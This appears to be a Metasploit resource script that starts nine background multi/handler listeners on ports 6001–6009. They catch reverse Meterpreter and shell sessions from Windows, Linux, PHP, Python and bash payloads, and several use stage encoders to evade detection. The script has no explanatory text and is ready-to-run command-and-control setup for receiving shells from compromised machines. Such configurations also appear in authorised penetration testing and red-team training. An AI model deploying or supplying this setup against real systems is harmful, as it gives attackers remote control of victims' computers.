use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lport 6001
set lhost 0.0.0.0
set exitonsession false
set enablestageencoding true
set stageencoder x86/fnstenv_mov
run -j

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lport 6002
set lhost 0.0.0.0
set exitonsession false
set enablestageencoding true
set stageencoder x86/fnstenv_mov
run -j

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_http
set lport 6003
set lhost 0.0.0.0
set exitonsession false
set enablestageencoding true
set stageencoder x64/xor
run -j

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lport 6004
set lhost 0.0.0.0
set exitonsession false
set enablestageencoding true
set stageencoder x86/fnstenv_mov
run -j

use exploit/multi/handler
set payload cmd/unix/reverse_bash
set lport 6005
set lhost 0.0.0.0
set exitonsession false
run -j

use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lport 6006
set lhost 0.0.0.0
set exitonsession false
set enablestageencoding true
set stageencoder x64/xor
run -j

use exploit/multi/handler
set payload php/meterpreter_reverse_tcp
set lport 6007
set lhost 0.0.0.0
set exitonsession false
run -j

use exploit/multi/handler
set payload python/meterpreter_reverse_tcp
set lport 6008
set lhost 0.0.0.0
set exitonsession false
run -j

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lport 6009
set lhost 0.0.0.0
set exitonsession false
set enablestageencoding true
set stageencoder x64/zutto_dekiru
run -j

